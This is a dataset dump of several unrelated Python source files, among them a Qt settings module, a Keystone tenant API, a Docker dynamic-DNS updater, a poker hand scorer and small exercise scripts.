color\n\n def setDigitalHourColor(self, newcolor=False):\n palette = self.DigitalHourColor.palette()\n oldcolor = palette.window().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Window, newcolor)\n self.DigitalHourColor.setPalette(palette)\n\n def setDigitalSecondColor(self, newcolor=False):\n palette = self.DigitalSecondColor.palette()\n oldcolor = palette.window().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Window, newcolor)\n self.DigitalSecondColor.setPalette(palette)\n\n def setDigitalDigitColor(self, newcolor=False):\n palette = self.DigitalDigitColor.palette()\n oldcolor = palette.window().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Window, newcolor)\n self.DigitalDigitColor.setPalette(palette)\n\n def openColorDialog(self, initcolor):\n colordialog = QColorDialog()\n selectedcolor = colordialog.getColor(initcolor, None, 'Please select a color')\n if selectedcolor.isValid():\n return selectedcolor\n else:\n return initcolor\n\n def getColorFromName(self, colorname):\n color = QColor()\n color.setNamedColor( colorname )\n return color\n\n def openLogoPathSelector(self):\n filename = QFileDialog.getOpenFileName(self, \"Open File\", \"\", \"Image Files (*.png)\" )\n if filename:\n self.logoPath.setText(filename)\n\n def resetLogo(self):\n self.logoPath.setText(\":/astrastudio_logo/images/astrastudio_transparent.png\")\n\n def setLogoPath(self, path):\n self.logoPath.setText(path)\n\n","sub_path":"settings_functions.py","file_name":"settings_functions.py","file_ext":"py","file_size_in_byte":23079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"337822219","text":"import asyncio\nfrom typing import Any, Coroutine\n\nfrom ..types.slack.response import APIResponse\n\n\nasync def retry(coro: Coroutine[Any, Any, APIResponse]) -> APIResponse:\n sleep = 1\n while True:\n resp = await coro\n if isinstance(resp.body, dict) and resp.body['ok']:\n return resp\n if sleep > 16:\n return resp\n if resp.status == 429:\n seconds = int(resp.headers['Retry-After']) + 0.5\n await asyncio.sleep(seconds)\n else:\n await asyncio.sleep(sleep)\n sleep += 1\n","sub_path":"yui/utils/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"440503053","text":"#!/usr/bin/python\n\"\"\" checks to see if srvy.db exists in ../archive. If not it creates the db and appropriate table \"\"\"\n\nimport sqlite3\nfrom sqlite3 import Error\n\ndef create_conection(db_file):\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n conn.close()\n\ndef create_table(db_file,create_table_sql):\n try:\n conn = sqlite3.connect(db_file)\n c = conn.cursor()\n c.execute(create_table_sql)\n except Error as e:\n print(e)\n finally:\n conn.close\n\ndef main():\n database = \"../archive/srvy.db\"\n create_conection(database)\n create_srvy_table = \"\"\" CREATE TABLE IF NOT EXISTS responses (response_key INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n pythonDateTime TEXT NOT NULL,\n unixTime REAL NOT NULL,\n question TEXT NOT NULL,\n opinion INTEGER NOT NULL\n );\"\"\"\n create_table(database, create_srvy_table)\n\nmain()\n","sub_path":"collection/setup_db.py","file_name":"setup_db.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"267551621","text":"import pandas as pd\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\n\n\n\nclass MCTracksData:\n def __init__(self, fname, lats_fname, lons_fname):\n self.src_fname = fname\n self.read_MCtracks_data()\n self.lats = np.squeeze(np.load(lats_fname))\n self.lons = np.squeeze(np.load(lons_fname))\n y = np.arange(0, self.lats.shape[0], 1)\n x = np.arange(0, self.lats.shape[1], 1)\n self.xmesh, self.ymesh = np.meshgrid(x, y)\n\n def read_MCtracks_data(self):\n TracksData = pd.read_csv(self.src_fname, sep=';', decimal='.',\n dtype={'Synop':np.uint8,\n 'ClType':np.uint8,\n 'McID':np.short,\n 'DateTime':str,\n 'Lon':float,\n 'Lat':float,\n 'Diameter':float})\n TracksData['dt'] = pd.to_datetime(TracksData.DateTime, format='%Y%m%d%H')\n self.tracks_data = TracksData[TracksData.Diameter > 0.]\n\n def get_mc_data(self, dt):\n cur_datetime_mcs = self.tracks_data[self.tracks_data.dt == dt]\n\n cur_snapshot_mcs_bboxes = []\n targetlabels_images = []\n\n for idx, cur_mc in cur_datetime_mcs.iterrows():\n dLats = self.lats - cur_mc.Lat\n dlons = self.lons - cur_mc.Lon\n rsqr = np.square(dLats) + np.square(dlons)\n minrsqr_idx = np.unravel_index(np.argmin(rsqr), rsqr.shape)\n xy_dist_sqr = np.square(self.xmesh - minrsqr_idx[1]) + np.square(self.ymesh - minrsqr_idx[0])\n km_dist_sqr = xy_dist_sqr * 25.\n\n #region debug_plot\n # f = plt.figure(figsize=(4,4), dpi=300)\n # plt.imshow(km_dist_sqr, cmap='jet')\n # plt.show()\n #endregion debug_plot\n\n diameter_sqr = cur_mc.Diameter ** 2\n cur_target = (km_dist_sqr <= diameter_sqr).astype(np.uint8)\n\n # region debug_plot\n # f = plt.figure(figsize=(4, 4), dpi=300)\n # plt.imshow(cur_target, cmap='gray')\n # plt.show()\n # endregion debug_plot\n\n x,y,w,h = cv2.boundingRect(cur_target)\n targetlabels_images.append(cur_target)\n #convert to X1Y1X2Y2 format\n x1,y1,x2,y2 = (x, y, x+w, y+h)\n cur_snapshot_mcs_bboxes.append(np.array([x1,y1,x2,y2])[np.newaxis,:])\n cur_snapshot_mcs_bboxes = np.concatenate(cur_snapshot_mcs_bboxes, axis=0)\n return cur_snapshot_mcs_bboxes, targetlabels_images","sub_path":"utils/read_tracks_data.py","file_name":"read_tracks_data.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598569685","text":"import json\n\nfrom falcon import before, HTTP_200, HTTP_201, HTTP_204, HTTPNotFound\n\nfrom service.resources import BaseResource, validate\nfrom service.schema import load_schema\nfrom service.requester import request, request_post_patch\n\nfrom service.authz.policy import enforce\nfrom service.conf_reader import ConfReader\n\n\ndef validate_id(req, resp, tenant_id):\n \"\"\"\n Validate if the id is on the endpoint\n \"\"\"\n if not tenant_id:\n raise HTTPNotFound()\n\n\nclass TenantAPI(BaseResource):\n \"\"\"\n API that allows tenant management. This API exposes an Option, GET, POST, PATCH and DELETE Methods. This converts\n Keystone Domain objects into simple Tenant objects. All methods translate keystone URI to internal URI.\n \"\"\"\n\n KS_ENDPOINT = ConfReader().get('keystone', 'url') + '/domains'\n\n ROUTES = [\n 'tenants/',\n 'tenants',\n 'tenants/{tenant_id}',\n 'tenants/{tenant_id}/'\n ]\n\n SERVICE_NAME = 'Tenant'\n\n @staticmethod\n def convert_domain_tenant(req, specific=True, r=None, domain=None):\n \"\"\"\n Converts a Keystone Object in a tenant object. Corrects the links and removes the domain keyword.\n :param req: The request object to set the result\n :param specific: The original search was performed for a specific tenant\n :param r: The original request object to keystone with the response. If provided the data is\n loaded from the object.\n :param domain: The domain to convert. If provided the data is the object itself.\n :return: The tenant object\n \"\"\"\n if r:\n data = json.loads(r.text)\n tenant = data['domain']\n else:\n tenant = domain\n\n tenant['links']['self'] = req.uri if specific else req.uri + '/' + tenant['id']\n return tenant\n\n def on_options(self, req, resp, **kargs):\n \"\"\"\n OPTIONS method for the Tenant API\n :return:\n 204 No Content - Header with the allow and all HTTP methods available\n \"\"\"\n if kargs:\n resp.set_header('Allow', 'DELETE, GET, OPTIONS, PATCH')\n else:\n resp.set_header('Allow', 'GET, OPTIONS, POST')\n resp.status = HTTP_204\n\n @enforce(SERVICE_NAME, 'default')\n def on_get(self, req, resp, **kwargs):\n \"\"\"\n List tenants. This method processes the HTTP get request for this API.\n If the tenant_id is provided the specific get tenant method is called,\n otherwise the get all tenants method is retrieved.\n \"\"\"\n if kwargs:\n self.get_specific_tenant(req, resp, kwargs.get('tenant_id', None))\n else:\n self.get_all_tenants(req, resp)\n\n def get_all_tenants(self, req, resp):\n \"\"\"\n Method to retrieve all tenants from the identity service. This endpoint is only accessible to Super ADMIN users.\n :return:\n 200 OK - When all tenants are retrieved with success\n \"\"\"\n r = request(\n TenantAPI.KS_ENDPOINT,\n headers={'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n service_name=TenantAPI.SERVICE_NAME\n )\n data = json.loads(r.text)\n\n # Convert object\n tenants = data.get('domains', None)\n tenants = list(map(lambda domain: self.convert_domain_tenant(req, specific=False, domain=domain), tenants))\n links = data.get('links', None)\n links[\"self\"] = req.uri\n\n resp.body = self.format_body(dict(tenants=tenants, links=links), from_dict=True)\n\n def get_specific_tenant(self, req, resp, tenant_id):\n \"\"\"\n Method to retrieve a single tenant. This endpoint is accessible to a Tenant Admin,\n that can only query it's tenant and Super Admin.\n :param tenant_id: Tenant ID to retrieve\n :return:\n 200 OK - When the tenant is found and successfully retrieved\n \"\"\"\n # Configure correct endpoint\n endpoint = TenantAPI.KS_ENDPOINT + '/' + tenant_id\n\n # Request the tenant\n r = request(\n endpoint,\n headers={'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n service_name=TenantAPI.SERVICE_NAME\n )\n tenant = TenantAPI.convert_domain_tenant(req, r=r)\n resp.body = self.format_body(dict(tenant=tenant), from_dict=True)\n resp.status = HTTP_200\n\n @enforce(SERVICE_NAME, 'default')\n @validate(load_schema('tenant'))\n def on_post(self, req, resp, parsed):\n \"\"\"\n Method to create new tenant. This endpoint is accessible to Super Admin only.\n The name of each tenant must be unique.\n :return:\n 201 Created - When the tenant is successfully created\n \"\"\"\n data = parsed.get('tenant')\n\n # Build KS Request\n enabled = True # By default a domain is enabled\n ks_domain = dict(name=data.get('name'), enabled=enabled, description=data.get('description'))\n\n # Process request\n r = request_post_patch(\n TenantAPI.KS_ENDPOINT, method='POST',\n headers={'Content-Type': 'application/json', 'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n json=dict(domain=ks_domain),\n service_name=TenantAPI.SERVICE_NAME\n )\n\n tenant = TenantAPI.convert_domain_tenant(req, r=r)\n resp.body = self.format_body(dict(tenant=tenant), from_dict=True)\n resp.status = HTTP_201\n\n @validate(load_schema('tenant_update'))\n @enforce(SERVICE_NAME, 'default')\n def on_patch(self, req, resp, tenant_id, parsed):\n \"\"\"\n Method to update a Tenant. This endpoint is only accessible to the Super Admin.\n It's not required the full object only the updated fields.\n :param tenant_id: The tenant id to edit\n :return:\n 200 OK - When the tenant is edited successfully\n \"\"\"\n # Configure correct endpoint\n endpoint = TenantAPI.KS_ENDPOINT + '/' + tenant_id\n\n data = parsed.get('tenant')\n\n r = request_post_patch(\n endpoint, method='PATCH',\n headers={'Content-Type': 'application/json', 'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n json=dict(domain=data),\n service_name=TenantAPI.SERVICE_NAME\n )\n\n tenant = TenantAPI.convert_domain_tenant(req, r=r)\n resp.body = self.format_body(dict(tenant=tenant), from_dict=True)\n resp.status = HTTP_200\n\n @before(validate_id)\n @enforce(SERVICE_NAME, 'default')\n def on_delete(self, req, resp, tenant_id):\n \"\"\"\n Method to delete a Tenant. This endpoint is only accessible to the Super Admin.\n Before deleting the tenant the method ensures the tenant is disabled.\n :param tenant_id: The tenant id to delete\n :return:\n 204 No Content - When the tenant is successfully deleted\n \"\"\"\n # Configure correct endpoint\n endpoint = TenantAPI.KS_ENDPOINT + '/' + tenant_id\n\n # Ensure the tenant is disabled\n ks_domain = dict(enabled=False)\n request_post_patch(\n endpoint, 'PATCH',\n headers={'Content-Type': 'application/json', 'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n json=dict(domain=ks_domain),\n service_name=TenantAPI.SERVICE_NAME\n )\n request(\n endpoint, method='DELETE',\n headers={'Content-Type': 'application/json', 'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n service_name=TenantAPI.SERVICE_NAME\n )\n resp.status = HTTP_204\n","sub_path":"IdentityService/service/resources/tenant.py","file_name":"tenant.py","file_ext":"py","file_size_in_byte":7565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"176225639","text":"import math\nimport constants as C\n\n\nclass ChenScore(object):\n \"\"\" Scores a hand according to the Chen forumula.\n See:\n www.thepokerbank.com/strategy/basic/starting-hand-selection/chen-formula\n \"\"\"\n CARD_TO_POINTS = {C.ACE: 10, C.KING: 8, C.QUEEN: 7, C.JACK: 6}\n GAP_MINUS_POINTS = {1: -1, 2: -2, 3: -4}\n\n def __init__(self, hand):\n self.hand = hand\n\n def score(self):\n \"\"\"Scores a hand based on the Chen system\"\"\"\n points = self.points_for_card(self.hand.high)\n\n # For a pair, return double the high cards value\n if self.hand.is_pair():\n return max(points * 2, 5)\n\n # Add two points if the cards are suited\n if self.hand.is_suited():\n points = points + 2\n\n # Subtract points if there is a gap between the two cards\n if not self.hand.is_connected():\n gap_penalty = self.GAP_MINUS_POINTS.get(self.hand.card_gap())\n if not gap_penalty:\n gap_penalty = -5\n\n points = points + gap_penalty\n\n # Add 1 point if there is a 0 or 1 card gap and both cards < Q\n if self.hand.high.value < C.QUEEN and \\\n self.hand.is_connected() or self.hand.card_gap() == 1:\n points = points + 1\n\n return math.ceil(points)\n\n def points_for_card(self, card):\n points = self.CARD_TO_POINTS.get(card.value)\n if not points:\n points = card.value * 0.5\n return points\n","sub_path":"pokeher/chen.py","file_name":"chen.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"600381074","text":"fin = open('C:\\\\Users\\\\Ani\\\\Downloads\\\\rosalind_revp.txt', 'r')\r\nfout = open('C:\\\\Users\\\\Ani\\\\OneDrive\\\\Desktop\\\\output.txt', 'w')\r\ntext = fin.readlines()\r\ndna = ''\r\nfor i in text[1:]:\r\n dna += i.replace(\"\\n\",\"\")\r\ndef reverse_palindrome(text):\r\n dc = {}\r\n for i in range(4,13):\r\n for j in range(len(text)-i+1):\r\n pattern = text[j:j+i]\r\n reverse_pattern = \"\".join(([{'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'}[l]\r\n for l in list(pattern)])[::-1])\r\n if pattern == reverse_pattern:\r\n dc[str(j+1)] = len(pattern)\r\n return dc\r\n\r\nresult = reverse_palindrome(dna)\r\n\r\nfor k,v in result.items():\r\n fout.write(k+\" \" + str(v)+\"\\n\")","sub_path":"bioinformatics_stronghold/locating_restriction_sites.py","file_name":"locating_restriction_sites.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"200874815","text":"#Prueba del programa 3.3: progrma _3_03Prueba.py\n# Prueba del programa para la veriudicaion de parentesis\n\nfrom ParentesisBalanceados import verificarParentesis\n\nverificacion = verificarParentesis(\"(2+1)\")\n\n\nif verificacion:\n print( \"los paréntesis están balanceados\")\n\nelse:\n print(\"los paréntesis no están balanceados\")\n\n","sub_path":"estructuras_de_datos/clase 23-05-2019/PruebaBalanceados.py","file_name":"PruebaBalanceados.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236135488","text":"#!/usr/bin/env python3\nimport argparse\nimport logging\nimport docker\nimport json\nimport sys\nimport socket\nimport dns\nimport dns.tsigkeyring\nimport dns.update\nimport dns.query\n\n\nlogging.basicConfig( format = '%(asctime)s:%(levelname)s:%(message)s', level = logging.INFO )\n\nconfigfile = 'docker-ddns.json'\ntsigfile = 'secrets.json'\n\nparser = argparse.ArgumentParser(description=\"Dynamic DNS updater\")\nparser.add_argument(\"-v\", \"--apiversion\", default=None, help=\"Docker api version\")\nargs = parser.parse_args()\nif args.apiversion: client = docker.from_env(version=args.apiversion)\nelse: client = docker.from_env()\n\n\"\"\"\nLoadConfig\n Load the configuration options from configfile and tsigfile\n\"\"\"\ndef loadconfig():\n logging.debug( 'Loading Config Information' )\n configfh = open( configfile, mode = 'r' )\n config = json.load( configfh )\n configfh.close()\n \n logging.debug( 'Loading DNS Key Data' )\n tsighandle = open( tsigfile, mode = 'r' )\n config['keyring'] = dns.tsigkeyring.from_text( json.load( tsighandle ) )\n tsighandle.close()\n return config\n \ndef startup():\n containers = []\n logging.debug( 'Check running containers and update DDNS' )\n for container in client.containers.list():\n containerinfo = container_info( json.dumps( container.attrs ) )\n if containerinfo:\n dockerddns( 'start', containerinfo )\n\n\ndef container_info( container ):\n inspect = json.loads( container )\n container = {}\n networkmode = inspect[\"HostConfig\"][\"NetworkMode\"]\n container['hostname'] = inspect[\"Config\"][\"Hostname\"]\n container['name'] = inspect[\"Name\"].split( '/', 1 )[1]\n if ( \"services\" in inspect[\"Config\"][\"Labels\"] ):\n container['srvrecords'] = inspect[\"Config\"][\"Labels\"][\"services\"]\n print( \"%s\\n\" % ( container['srvrecords'] ) )\n if ( ( str( networkmode ) != 'host' ) and ( 'container:' not in networkmode ) ):\n if ( str( networkmode ) != 'default' ):\n container['ip'] = inspect[\"NetworkSettings\"][\"Networks\"][networkmode][\"IPAddress\"]\n container['ipv6'] = inspect[\"NetworkSettings\"][\"Networks\"][networkmode][\"GlobalIPv6Address\"]\n else:\n container['ip'] = inspect[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"IPAddress\"]\n container['ipv6'] = inspect[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"GlobalIPv6Address\"]\n else:\n return False\n return container\n\n\ndef dockerddns( action, event ):\n config = loadconfig()\n dnsserver = config['dockerddns']['dnsserver']\n ttl = config['dockerddns']['ttl']\n port = config['dockerddns']['dnsport']\n update = dns.update.Update( config['dockerddns']['zonename'], keyring = config['keyring'], keyname = config['dockerddns']['keyname'] )\n if ( \"srvrecords\" in event ):\n srvrecords = event[\"srvrecords\"].split()\n for srv in srvrecords:\n values = srv.split( \"#\" )\n print( \"%s %s\\n\" % ( values, event['hostname'] ) )\n if ( action == 'start' and event['ip'] != '0.0.0.0' ):\n update.replace( event['hostname'], ttl, 'A', event['ip'] )\n if ( \"ipv6\" in event ):\n if event['ipv6'] != \"\":\n ipv6addr = event['ipv6'].replace( config['dockerddns']['intprefix'], config['dockerddns']['extprefix'] )\n update.replace( event['hostname'], ttl, 'AAAA', ipv6addr )\n logging.info( '[%s] Updating dns %s , setting %s.%s to %s and %s' % \n ( event['name'], dnsserver, event['hostname'], config['dockerddns']['zonename'], event['ip'], ipv6addr ) )\n else:\n logging.info( '[%s] Updating dns %s , setting %s.%s to %s' % ( event['name'], dnsserver, event['hostname'], config['dockerddns']['zonename'], event['ip'] ) )\n\n elif ( action == 'die' ):\n logging.info( '[%s] Removing entry for %s.%s in %s' % ( event['name'], event['hostname'], config['dockerddns']['zonename'], dnsserver ) )\n update.delete( event['hostname'] )\n try: \n response = dns.query.tcp( update, dnsserver, timeout = 10, port = port )\n except ( socket.error, dns.exception.Timeout ):\n logging.error( 'Timeout updating DNS' )\n response = 'Timeout Socket'\n pass\n except dns.query.UnexpectedSource:\n logging.error( 'Unexpected Source' )\n response = 'UnexpectedSource'\n pass\n except dns.tsig.PeerBadKey:\n logging.error( 'Bad Key for DNS, Check your config files' )\n response = \"BadKey\"\n pass\n\n if response.rcode() != 0: \n logging.error( \"[%s] Error Reported while updating %s (%s/%s)\" % ( event['name'], event['hostname'], dns.rcode.to_text( response.rcode() ), response.rcode() ) )\n\ndef process():\n containerinfo = {}\n events = client.events( decode = True )\n startup()\n for event in events:\n if event['Type'] == \"container\" and event['Action'] in ('start','die') :\n docker_info = json.dumps(event)\n temp=client.containers.get(event['id'])\n containerinfo = container_info( json.dumps(temp.attrs) )\n if event['Action'] == 'start':\n if containerinfo:\n logging.debug( \"Container %s is starting with hostname %s and ipAddr %s\"\n % ( containerinfo['name'],\n containerinfo['hostname'], containerinfo['ip'] ) )\n dockerddns( event['Action'], containerinfo )\n elif event['Action'] == 'die':\n if containerinfo:\n logging.debug( \"Container %s is stopping %s\" % \n ( containerinfo['name'],\n containerinfo['hostname'] ) )\n dockerddns( event['Action'], containerinfo )\n\ntry:\n process()\nexcept KeyboardInterrupt:\n logging.info( 'CTRL-C Pressed, GoodBye!' )\n sys.exit()\n","sub_path":"docker-ddns.py","file_name":"docker-ddns.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"181313296","text":"from character import Character\nfrom time import sleep\nimport monster\n\nprint('A hero is walking in the plains, searching for a challenge...')\nhero_name = input('Enter his / her name: ')\n\nhero = Character(hero_name)\ntutorial_monster = monster.Tiny_dino()\nsleep(1)\n\ntutorial_monster.print_monster()\ntutorial_monster.roar()\n\nsleep(1)\n\nprint('Suddenly, a monster appears!')\nsleep(2)\n\ntutorial_monster.look_sky()\n\nsleep(3)\nprint(\"And... he seems to be a little bit stupid. Let's practice.\")\n","sub_path":"simpleRPG.py","file_name":"simpleRPG.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}